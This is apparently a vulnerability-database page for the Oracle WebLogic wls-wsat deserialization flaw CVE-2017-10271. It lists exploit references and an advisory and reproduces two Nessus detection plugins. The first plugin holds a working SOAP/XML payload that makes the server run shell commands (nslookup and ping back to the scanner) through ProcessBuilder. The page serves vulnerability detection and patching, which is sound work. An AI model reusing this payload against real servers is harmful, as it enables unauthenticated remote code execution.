Vulnerabilities > CVE-2017-10271 - Unspecified vulnerability in Oracle Weblogic Server

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
oracle
nessus
exploit available
metasploit

Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Exploit-Db

  • idEDB-ID:43392
    last seen2018-11-30
    modified2017-12-26
    published2017-12-26
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/43392
    titleOracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
  • descriptionOracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit). CVE-2017-10271. Remote exploit for Multiple platform. Tags: Metasplo...
    fileexploits/multiple/remote/43924.rb
    idEDB-ID:43924
    last seen2018-01-29
    modified2018-01-29
    platformmultiple
    port
    published2018-01-29
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/43924/
    titleOracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
    typeremote
  • descriptionOracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution. CVE-2017-10271. Remote exploit for Multiple platform
    fileexploits/multiple/remote/43458.py
    idEDB-ID:43458
    last seen2018-01-24
    modified2018-01-03
    platformmultiple
    port
    published2018-01-03
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/43458/
    titleOracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution
    typeremote

Metasploit

Nessus

  • NASL familyWeb Servers
    NASL idWEBLOGIC_2017_10271.NASL
    descriptionThe remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.
    last seen2020-06-01
    modified2020-06-02
    plugin id105484
    published2017-12-28
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105484
    titleOracle WebLogic WSAT Remote Code Execution
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(105484);
      script_version("1.16");
      script_cvs_date("Date: 2019/11/08");
    
      script_cve_id("CVE-2017-10271");
    
      script_name(english:"Oracle WebLogic WSAT Remote Code Execution");
      script_summary(english:"Sends an HTTP POST request and looks for DNS response");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Oracle WebLogic server is affected by a remote code
    execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote Oracle WebLogic server is affected by a remote code
    execution vulnerability in the WSAT endpoint due to unsafe
    deserialization of XML encoded Java objects. An unauthenticated,
    remote attacker can exploit this, via a crafted Java object, 
    to execute arbitrary Java code in the context of the WebLogic
    server.");
      # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b680917f");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the October 2017 Oracle
    Critical Patch Update advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10271");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/28");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"Web Servers");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("weblogic_detect.nasl");
      script_require_keys("www/weblogic");
      script_require_ports("Services/www", 80, 7001);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    appname = "Oracle WebLogic Server";
    
    get_kb_item_or_exit("www/weblogic");
    port = get_http_port(default:7001, embedded:FALSE);
    get_kb_item_or_exit("www/weblogic/" + port + "/installed");
    
    # establish if WSAT is enabled. If it isn't then we don't
    # need to proceed any futher
    res = http_send_recv3(
      method:'GET',
      item:'/wls-wsat/CoordinatorPortType',
      port:port,
      exit_on_fail:TRUE);
    if (empty_or_null(res) || '404' >< res[0])
    {
      audit(AUDIT_INST_VER_NOT_VULN, appname);
    }
    
    # generate a unique pattern for each execution. unixtime() is not
    # granular enough since there may be many installs and this script
    # could be running in parallel
    pattern = hexstr(rand_str(length:8));
    
    # create the HTTP request that will execute the DNS lookup. We'll try to execute
    # via both cmd and sh since we have no real insight into the remote OS.
    # Because some minimal Linux installs don't include nslookup, we'll also fallback
    # on using ping if necessary... although I think that is mostly paranoia.
    ns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();
    xml_encoded_java =
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">' +
      '<soapenv:Header>' +
        '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">' +
          '<java>' +
            '<void class="java.lang.ProcessBuilder">' +
              '<array class="java.lang.String" length="3" >' +
                '<void index="0">' +
                  '<string>cmd.exe</string>' +
                '</void>' +
                '<void index="1">' +
                  '<string>/c</string>' +
                '</void>' +
                '<void index="2">' +
                  '<string>' + ns_lookup + '</string>' +
                '</void>' +
              '</array>' +
              '<void method="start"/>' +
            '</void>' +
            '<void class="java.lang.ProcessBuilder">' +
              '<array class="java.lang.String" length="3" >' +
                '<void index="0">' +
                  '<string>/bin/sh</string>' +
                '</void>' +
                '<void index="1">' +
                  '<string>-c</string>' +
                '</void>' +
                '<void index="2">' +
                  '<string>' + ns_lookup + '</string>' +
                '</void>' +
              '</array>' +
              '<void method="start"/>' +
            '</void>' +
            '<void class="java.lang.ProcessBuilder">' +
              '<array class="java.lang.String" length="3" >' +
                '<void index="0">' +
                  '<string>/bin/sh</string>' +
                '</void>' +
                '<void index="1">' +
                  '<string>-c</string>' +
                '</void>' +
                '<void index="2">' +
                  '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +
                '</void>' +
              '</array>' +
              '<void method="start"/>' +
            '</void>' +
          '</java>' +
        '</work:WorkContext>' +
        '</soapenv:Header>' +
      '<soapenv:Body/>' +
    '</soapenv:Envelope>';
    request =
      'POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n' +
      'Host: ' + get_host_ip() + ':' + port + '\r\n' +
      'Content-Type: text/xml\r\n' +
      'Content-Length: ' + len(xml_encoded_java) + '\r\n' +
      '\r\n' +
      xml_encoded_java;
    
    soc = open_sock_tcp(port);
    if (!soc)
    {
      audit(AUDIT_SOCK_FAIL, port, appname);
    }
    
    filter = "(ip and udp and port 53 and src host " + get_host_ip() + ") or (icmp and icmp[0] = 8 and src host " + get_host_ip() + ")";
    response = send_capture(socket:soc, data:request, pcap_filter:filter);
    close(soc);
    
    if (empty_or_null(response))
    {
      # looks like we didn't execute anything on the host
      audit(AUDIT_INST_VER_NOT_VULN, appname);
    }
    
    # We can directly search the DNS response
    if (pattern >!< response)
    {
      # maybe this is an ICMP response?
      icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:"data")));
      if (empty_or_null(icmp_data))
      {
        audit(AUDIT_INST_VER_NOT_VULN, appname);
      }
    
      if (pattern >!< icmp_data)
      {
        # couldn't find the pattern in the ICMP data
        audit(AUDIT_INST_VER_NOT_VULN, appname);
      } 
    }
    
    report =
      '\nNessus was able to exploit a Java deserialization vulnerability by' +
      '\nsending a crafted Java object.' +
      '\n';
    security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);
    
  • NASL familyMisc.
    NASL idORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL
    descriptionThe version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities
    last seen2020-06-01
    modified2020-06-02
    plugin id103935
    published2017-10-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103935
    titleOracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(103935);
      script_version("1.12");
      script_cvs_date("Date: 2019/11/12");
    
      script_cve_id(
        "CVE-2017-10152",
        "CVE-2017-10271",
        "CVE-2017-10334",
        "CVE-2017-10336",
        "CVE-2017-10352"
      );
      script_bugtraq_id(101304, 101351, 101392);
    
      script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)");
      script_summary(english:"Checks for the patch.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An application server installed on the remote host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Oracle WebLogic Server installed on the remote host is
    affected by multiple vulnerabilities");
      # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1e07fa0e");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the October 2017 Oracle
    Critical Patch Update advisory.");
      script_set_attribute(attribute:"agent", value:"all");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10352");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/18");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_weblogic_server_installed.nbin", "os_fingerprint.nasl");
      script_require_keys("installed_sw/Oracle WebLogic Server");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("install_func.inc");
    
    app_name = "Oracle WebLogic Server";
    
    install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
    ohome = install["Oracle Home"];
    subdir = install["path"];
    version = install["version"];
    
    fix = NULL;
    fix_ver = NULL;
    
    # individual security patches
    if (version =~ "^10\.3\.6\.")
    {
      fix_ver = "10.3.6.0.171017";
      fix = "26519424";
    }
    else if (version =~ "^12\.1\.3\.")
    {
      fix_ver = "12.1.3.0.171017";
      fix = "26519417";
    }
    else if (version =~ "^12\.2\.1\.1($|[^0-9])")
    {
      fix_ver = "12.2.1.1.171017";
      fix = "26519400";
    }
    else if (version =~ "^12\.2\.1\.2($|[^0-9])")
    {
      fix_ver = "12.2.1.2.171017";
      fix = "26485996";
    }
    
    if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
    {
      os = get_kb_item_or_exit("Host/OS");
      if ('windows' >< tolower(os))
      {
        port = get_kb_item("SMB/transport");
        if (!port) port = 445;
      }
      else port = 0;
    
      report =
        '\n  Oracle home    : ' + ohome +
        '\n  Install path   : ' + subdir +
        '\n  Version        : ' + version +
        '\n  Required Patch : ' + fix +
        '\n';
      security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);
    }
    else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt
idPACKETSTORM:146143
last seen2018-01-29
published2018-01-28
reporterAlexey Tyurin
sourcehttps://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html
titleOracle WebLogic wls-wsat Component Deserialization Remote Code Execution

Saint

bid101304
descriptionOracle WebLogic Server WLS Security Component Deserialization Vulnerability
idweb_dev_weblogic
titleweblogic_wls_security_component_deserialization
typeremote

Seebug

bulletinFamilyexploit
description### 漏洞描述 黑客利用WebLogic 反序列化漏洞(CVE-2017-3248)和WebLogic WLS 组件漏洞(CVE-2017-10271)对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 10 月份发布了该漏洞的补丁。 该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限,危害巨大。由于漏洞较新,目前仍然存在很多主机尚未更新相关补丁。预计在此次突发事件之后,很可能出现攻击事件数量激增,大量新主机被攻陷的情况。 攻击者能够同时攻击Windows及Linux主机,并在目标中长期潜伏。由于Oracle WebLogic的使用面较为广泛,攻击面涉及各个行业。此次攻击中使用的木马为典型的比特币挖矿木马。但该漏洞可被黑客用于其它目的攻击。 ### 影响版本 * Oracle Weblogic Server 10.3.6.0 * Oracle Weblogic Server 12.2.1.2 * Oracle Weblogic Server 12.2.1.1 * Oracle Weblogic Server 12.1.3.0
idSSV:97009
last seen2018-06-26
modified2017-12-22
published2017-12-22
reporterMy Seebug
sourcehttps://www.seebug.org/vuldb/ssvid-97009
titleOracle WebLogic wls-wsat RCE(CVE-2017-10271)

The Hacker News

idTHN:F03064A70C65D9BD62A8F5898BA276D2
last seen2018-04-18
modified2018-04-18
published2018-04-17
reporterMohit Kumar
sourcehttps://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html
titleHackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners